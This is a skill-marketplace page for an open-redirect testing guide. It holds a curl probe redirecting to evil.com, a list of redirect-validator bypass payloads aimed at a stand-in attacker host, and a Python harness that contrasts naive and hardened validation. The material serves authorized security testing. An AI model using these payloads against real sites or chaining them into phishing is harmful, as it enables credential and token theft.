testing-for-open-redirect-vulnerabilities

Identify and test open redirect vulnerabilities in web applications by analyzing URL redirection parameters, bypass techniques, and exploitation chains for phishing and token theft.

Featured | AI & Automation | 12,642 stars | 1,468 forks | Updated today | Apache-2.0


Quality Score: 99/100

| Criterion     | Weight | Score |
|---------------|--------|-------|
| Stars         | 20%    | 100   |
| Recency       | 20%    | 100   |
| Frontmatter   | 20%    | 70    |
| Documentation | 15%    | 100   |
| Issue Health  | 10%    | 50    |
| License       | 10%    | 100   |
| Description   | 5%     | 100   |

Skill Content

# Testing for Open Redirect Vulnerabilities

## When to Use

- When testing login/logout flows that redirect users to specified URLs
- During assessment of OAuth authorization endpoints with redirect_uri parameters
- When auditing applications with URL parameters (next, url, redirect, return, goto, target)
- During phishing simulation to chain open redirects with credential harvesting
- When testing SSO implementations for redirect validation weaknesses

## Prerequisites

- Burp Suite or OWASP ZAP for intercepting redirect requests
- Collection of open redirect bypass payloads
- External domain or Burp Collaborator for redirect confirmation
- Understanding of URL parsing and encoding schemes
- Browser with developer tools for observing redirect chains
- Knowledge of HTTP 301/302/303/307/308 redirect status codes

> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

## Workflow

### Step 1 — Identify Redirect Parameters

```bash
# Common redirect parameter names to test:
# ?url= ?redirect= ?next= ?return= ?returnUrl= ?goto= ?target=
# ?dest= ?destination= ?redir= ?redirect_uri= ?continue= ?view=

# Search for redirect parameters in the application
# Use Burp Suite to crawl and identify all parameters

# Test basic redirect
curl -v "http://target.com/login?next=https://evil.com"
curl -v "http://target.com/l...
```
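The step above lists parameter names and a single curl probe. What a tester actually needs next is a payload set, a way to build one request URL per payload, and a way to decide whether a returned Location value would carry a browser off-site once browser URL quirks (backslash as slash, `https:host` without slashes) are applied. The harness below is an added example, not code from the skill or from the mukul975/Anthropic-Cybersecurity-Skills repository; `target.com` and `evil.example` are placeholders for the application under test and a host you control (for example a Burp Collaborator domain), and `naive_is_safe`/`hardened_is_safe` are constructed validators that stand in for server-side checks you would otherwise only see indirectly through the response.

```python
# Added example (not part of the original skill). Generates the redirect-parameter
# test URLs from Step 1, resolves a Location value the way a browser would, and
# contrasts a naive "must start with /" validator with a hardened one.
# TARGET_HOST, ATTACKER_HOST and the validator functions are assumptions.
import re
from urllib.parse import parse_qsl, urlencode, urljoin, urlsplit, urlunsplit

TARGET_HOST = "target.com"      # application under test (placeholder)
ATTACKER_HOST = "evil.example"  # host you control, e.g. a Collaborator domain (placeholder)

# Parameter names listed in Step 1 of the skill.
REDIRECT_PARAMS = ["url", "redirect", "next", "return", "returnUrl", "goto",
                   "target", "dest", "destination", "redir", "redirect_uri",
                   "continue", "view"]

# "https:" followed by any number of slashes; browsers normalise all of these to "https://".
_SCHEME_SLASHES = re.compile(r"^(https?:)/*", re.IGNORECASE)


def bypass_payloads(attacker=ATTACKER_HOST, target=TARGET_HOST):
    """Payloads that slip past common weak checks; each comment names the check."""
    return [
        f"https://{attacker}",            # baseline absolute URL
        f"//{attacker}",                  # protocol-relative: satisfies startswith("/")
        f"/\\{attacker}",                 # backslash: browsers treat "\" as "/"
        f"https:{attacker}",              # missing "//": browsers insert it
        f"https://{target}.{attacker}",   # our host is only a subdomain label
        f"https://{attacker}/{target}",   # our host appears only in the path
        f"https://{target}@{attacker}",   # our host is the userinfo part
        f"https://{attacker}#{target}",   # our host is only in the fragment
        f"https://{attacker}?{target}",   # our host is only in the query
    ]


def build_test_urls(base_url, param, payloads):
    """One request URL per payload, with `param` set to the payload
    (percent-encoded) and any other query parameters preserved."""
    parts = urlsplit(base_url)
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k != param]
    return [urlunsplit(parts._replace(query=urlencode(kept + [(param, p)])))
            for p in payloads]


def resolve_like_browser(location, request_url):
    """Resolve a Location header value the way a WHATWG browser would:
    backslashes count as slashes, and 'https:host' / 'https:/host' mean
    'https://host'. Returns the urlsplit() result of the final URL."""
    loc = location.strip().replace("\\", "/")
    loc = _SCHEME_SLASHES.sub(r"\1//", loc)
    return urlsplit(urljoin(request_url, loc))


def browser_host(location, request_url):
    """Host the browser actually lands on after the redirect (None if there is no host)."""
    return resolve_like_browser(location, request_url).hostname


def naive_is_safe(next_url):
    """Constructed weak validator: 'relative paths only'. Deliberately vulnerable,
    kept here to show which payloads get through it."""
    return next_url.startswith("/")


def hardened_is_safe(next_url, allowed_host=TARGET_HOST):
    """Resolve like a browser first, then require an http(s) scheme and an exact
    host match. A plain relative path resolves to allowed_host and passes;
    every payload in bypass_payloads() fails."""
    resolved = resolve_like_browser(next_url, f"https://{allowed_host}/login")
    return resolved.scheme in ("http", "https") and resolved.hostname == allowed_host


def evaluate(payloads=None, target=TARGET_HOST):
    """Map each payload to (passes_naive, passes_hardened, host_the_browser_visits)."""
    request_url = f"https://{target}/login"
    chosen = payloads if payloads is not None else bypass_payloads(target=target)
    return {p: (naive_is_safe(p), hardened_is_safe(p, target), browser_host(p, request_url))
            for p in chosen}


if __name__ == "__main__":
    for url in build_test_urls(f"http://{TARGET_HOST}/login?lang=en", "next", bypass_payloads()):
        print(url)
    for payload, (naive, hardened, host) in evaluate().items():
        print(f"{payload!r:40} naive={naive!s:5} hardened={hardened!s:5} browser->{host}")
```

Two practical notes. `hardened_is_safe` demands an exact host match; if subdomains must be allowed, compare against a dotted suffix (`host == allowed or host.endswith("." + allowed)`) rather than a substring, since the subdomain-label and path payloads above exist precisely to defeat substring checks. And when the server decodes the parameter before validating it, send each payload a second time double-encoded (for example `%252F%252F` for `//`); `browser_host` is then applied to whatever Location the server finally emits, which is the value the victim's browser sees.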

Details

Author: mukul975
Repository: mukul975/Anthropic-Cybersecurity-Skills
Created: 3 months ago
Last Updated: today
Language: Python
License: Apache-2.0

Similar Skills

Semantically similar based on skill content — not just same category

exploiting-oauth-misconfiguration | AI & Automation | Featured | mukul975 | 12,642 stars | Updated today
Identifying and exploiting OAuth 2.0 and OpenID Connect misconfigurations including redirect URI manipulation, token leakage, and authorization code theft during security assessments.

testing-oauth2-implementation-flaws | Testing & QA | Featured | mukul975 | 12,642 stars | Updated today
Tests OAuth 2.0 and OpenID Connect implementations for security flaws including authorization code interception, redirect URI manipulation, CSRF in OAuth flows, token leakage, scope escalation, and PKCE bypass. The tester evaluates the authorization server, client application, and token handling for common misconfigurations that enable account takeover or unauthorized access. Activates for requests involving OAuth security testing, OIDC vulnerability assessment, OAuth2 redirect bypass, or authorization code flow testing.

idor-testing | Testing & QA | Featured | sickn33 | 39,227 stars | Updated today
Provide systematic methodologies for identifying and exploiting Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.

file-path-traversal | AI & Automation | Featured | sickn33 | 39,227 stars | Updated today
Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code.

idor-vulnerability-testing | Testing & QA | Solid | davila7 | 27,681 stars | Updated today
This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references," or "bypass authorization to access other users' data." It provides comprehensive guidance for detecting, exploiting, and remediating IDOR vulnerabilities in web applications.